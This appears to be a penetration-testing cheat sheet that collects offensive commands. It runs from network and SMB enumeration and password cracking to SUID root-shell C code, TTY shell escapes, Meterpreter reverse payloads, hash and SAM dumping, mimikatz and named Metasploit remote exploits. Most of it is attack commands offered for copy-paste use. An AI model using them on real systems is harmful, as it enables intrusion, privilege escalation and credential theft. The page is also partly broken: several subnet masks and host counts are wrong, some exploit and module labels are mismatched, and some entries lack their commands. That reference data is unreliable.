Nmap (“Network Mapper”) is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X.
Command
Description
nmap -v -sS -A -T4 target
Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services
nmap -v -sS -p–A -T4 target
As above but scans all TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 target
As above but scans all TCP ports and UDP scan (takes even longer)
Nmap script to scan for vulnerable SMB servers – WARNING: unsafe=1 may cause knockover
nmap localhost
Displays all the ports that are currently in use
ls /usr/share/nmap/scripts/* | grep ftp
Search nmap scripts for keywords
SMB enumeration
In computer networking, Server Message Block (SMB), one version of which was also known as Common Internet File System (CIFS, /ˈsɪfs/), operates as an application-layer network protocol mainly used for providing shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network
Command
Description
nbtscan 192.168.1.0/24
Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip
Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing
Other Host Discovery
Other methods of host discovery, that don’t use nmap…
Command
Description
netdiscover -r 192.168.1.0/24
Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you’re on the right VLAN at $client site
SMB Enumeration
Enumerate Windows shares / Samba shares.
Command
Description
nbtscan 192.168.1.0/24
Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip
Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing
Python Local Web Server
Python local web server command, handy for serving up shells and exploits on an attacking machine.
Command
Description
python -m SimpleHTTPServer 80
Run a basic http server, great for serving up shells etc
Mounting File Shares
How to mount NFS / CIFS, Windows and Linux file shares.
Command
Description
mount 192.168.1.1:/vol/share /mnt/nfs
Mount NFS share to /mnt/nfs
mount -t cifs -o username=user,password=pass
,domain=blah //192.168.1.X/share-name /mnt/cifs
Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)
net use Z: \\win-server\share password
/user:domain\janedoe /savecred /p:no
Mount a Windows share on Windows from the command line
apt-get install smb4k -y
Install smb4k on Kali, useful Linux GUI for browsing SMB shares
Basic FingerPrinting
A device fingerprint or machine fingerprint or browser fingerprint is information collected about a remote computing device for the purpose of identification. Fingerprints can be used to fully or partially identify individual users or devices even when cookies are turned off.
Command
Description
nc -v 192.168.1.1 25
telnet 192.168.1.1 25
Basic versioning / fingerprinting via displayed banner
SNMP Enumeration
SNMP enumeration is the process of using SNMP to enumerate user accounts on a target system. SNMP employs two major types of software components for communication: the SNMP agent, which is located on the networking device, and the SNMP management station, which communicates with the agent.
Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely. On Ubuntu it can be installed from the synaptic package manager. On Kali Linux, it is per-installed.
Use -t to limit concurrent connections, example: -t 15
Password Cracking
John The Ripper – JTR
John the Ripper is different from tools like Hydra. Hydra does blind brute-forcing by trying username/password combinations on a service daemon like ftp server or telnet server. John however needs the hash first. So the greater challenge for a hacker is to first get the hash that is to be cracked. Now a days hashes are more easily crackable using free rainbow tables available online. Just go to one of the sites, submit the hash and if the hash is made of a common word, then the site would show the word almost instantly. Rainbow tables basically store common words and their hashes in a large database. Larger the database, more the words covered.
Command
Description
john –wordlist=/usr/share/wordlists/rockyou.txt hashes
JTR password cracking
john –format=descrypt –wordlist
/usr/share/wordlists/rockyou.txt hash.txt
JTR forced descrypt cracking with wordlist
john –format=descrypt hash –show
JTR forced descrypt brute force cracking
Exploit Research
Ways to find exploits for enumerated hosts / services.
Command
Description
searchsploit windows 2003 | grep -i local
Search exploit-db for exploit, in this example windows 2003 + local esc
Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.
below are some quick copy and pate examples for various shells:
SUID C Shell for /bin/bash
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
SUID C Shell for /bin/sh
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}
Building the SUID Shell binary
gcc -o suid suid.c
For 32 bit:
gcc -m32 -o suid suid.c
TTY Shells
Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.
Python TTY Shell Trick
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
Spawn Interactive sh shell
/bin/sh -i
Spawn Perl TTY Shell
exec "/bin/sh";
perl —e 'exec "/bin/sh";'
Spawn Ruby TTY Shell
exec "/bin/sh"
Spawn Lua TTY Shell
os.execute('/bin/sh')
Spawn TTY Shell from Vi
Run shell commands from vi:
:!bash
Spawn TTY Shell NMAP
!sh
Metasploit
Metasploit was created by H. D. Moore in 2003 as a portable network tool using Perl. By 2007, the Metasploit Framework had been completely rewritten in Ruby. On October 21, 2009, the Metasploit Project announced that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions.
Like comparable commercial products such as Immunity’s Canvas or Core Security Technologies’ Core Impact, Metasploit can be used to test the vulnerability of computer systems or to break into remote systems. Like many information security tools, Metasploit can be used for both legitimate and unauthorized activities. Since the acquisition of the Metasploit Framework, Rapid7 has added two open core proprietary editions called Metasploit Express and Metasploit Pro.
Metasploit’s emerging position as the de facto exploit development framework led to the release of software vulnerability advisories often accompanied by a third party Metasploit exploit module that highlights the exploitability, risk and remediation of that particular bug. Metasploit 3.0 began to include fuzzing tools, used to discover software vulnerabilities, rather than just exploits for known bugs. This avenue can be seen with the integration of the lorcon wireless (802.11) toolset into Metasploit 3.0 in November 2006. Metasploit 4.0 was released in August 2011.
Meterpreter Payloads
Windows reverse meterpreter payload
Command
Description
set payload windows/meterpreter/reverse_tcp
Windows reverse tcp payload
Windows VNC Meterpreter payload
Command
Description
set payload windows/vncinject/reverse_tcp
set ViewOnly false
Meterpreter Windows VNC Payload
Linux Reverse Meterpreter payload
Command
Description
set payload linux/meterpreter/reverse_tcp
Meterpreter Linux Reverse Payload
Meterpreter Cheat Sheet
Useful meterpreter commands.
Command
Description
upload file c:\\windows
Meterpreter upload file to Windows target
download c:\\windows\\repair\\sam /tmp
Meterpreter download file from Windows target
download c:\\windows\\repair\\sam /tmp
Meterpreter download file from Windows target
execute -f c:\\windows\temp\exploit.exe
Meterpreter run .exe on target – handy for executing uploaded exploits
execute -f cmd -c
Creates new channel with cmd shell
ps
Meterpreter show processes
shell
Meterpreter get shell on the target
getsystem
Meterpreter attempts priviledge escalation the target
hashdump
Meterpreter attempts to dump the hashes on the target
portfwd add –l 3389 –p 3389 –r target
Meterpreter create port forward to target machine
portfwd delete –l 3389 –p 3389 –r target
Meterpreter delete port forward
Common Metasploit Modules
Remote Windows Metasploit Modules (exploits)
Command
Description
use exploit/windows/smb/ms08_067_netapi
MS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapi
MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/
ms09_050_smb2_negotiate_func_index
MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit
Local Windows Metasploit Modules (exploits)
Command
Description
use exploit/windows/local/bypassuac
Bypass UAC on Windows 7 + Set target + arch, x86/64
Auxilary Metasploit Modules
Command
Description
use auxiliary/scanner/http/dir_scanner
Metasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscan
Metasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_login
Metasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_version
Metasploit MSSQL Version Scanner
use auxiliary/scanner/oracle/oracle_login
Metasploit Oracle Login Module
Metasploit Powershell Modules
Command
Description
use exploit/multi/script/web_delivery
Metasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershell
Metasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployer
Metasploit JBOSS deploy
use exploit/windows/mssql/mssql_payload
Metasploit MSSQL payload
Post Exploit Windows Metasploit Modules
Command
Description
run post/windows/gather/win_privs
Metasploit show privileges of current user
use post/windows/gather/credentials/gpp
Metasploit grab GPP saved passwords
load mimikatz -> wdigest
Metasplit load Mimikatz
run post/windows/gather/local_admin_search_enum
Idenitfy other machines that the supplied domain user has administrative access to
Networking
TTL Fingerprinting
Operating System
TTL Size
Windows
128
Linux
64
Solaris
255
Cisco / Network
255
IPv4
Classful IP Ranges
E.g Class A,B,C (depreciated)
Class
IP Address Range
Class A IP Address Range
0.0.0.0 – 127.255.255.255
Class B IP Address Range
128.0.0.0 – 191.255.255.255
Class C IP Address Range
192.0.0.0 – 223.255.255.255
Class D IP Address Range
224.0.0.0 – 239.255.255.255
Class E IP Address Range
240.0.0.0 – 255.255.255.255
IPv4 Private Address Ranges
Class
Range
Class A Private Address Range
10.0.0.0 – 10.255.255.255
Class B Private Address Range
172.16.0.0 – 172.31.255.255
Class C Private Address Range
192.168.0.0 – 192.168.255.255
127.0.0.0 – 127.255.255.255
IPv4 Subnet Cheat Sheet
CIDR
Decimal Mask
Number of Hosts
/31
255.255.255.254
1 Host
/30
255.255.255.252
2 Hosts
/29
255.255.255.249
6 Hosts
/28
255.255.255.240
14 Hosts
/27
255.255.255.224
30 Hosts
/26
255.255.255.192
62 Hosts
/25
255.255.255.128
126 Hosts
/24
255.255.255.0
254 Hosts
/23
255.255.254.0
512 Host
/22
255.255.252.0
1022 Hosts
/21
255.255.248.0
2046 Hosts
/20
255.255.240.0
4094 Hosts
/19
255.255.224.0
8190 Hosts
/18
255.255.192.0
16382 Hosts
/17
255.255.128.0
32766 Hosts
/16
255.255.0.0
65534 Hosts
/15
255.254.0.0
131070 Hosts
/14
255.252.0.0
262142 Hosts
/13
255.248.0.0
524286 Hosts
/12
255.240.0.0
1048674 Hosts
/11
255.224.0.0
2097150 Hosts
/10
255.192.0.0
4194302 Hosts
/9
255.128.0.0
8388606 Hosts
/8
255.0.0.0
16777214 Hosts
ASCII Table Cheat Sheet
Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.
请发表评论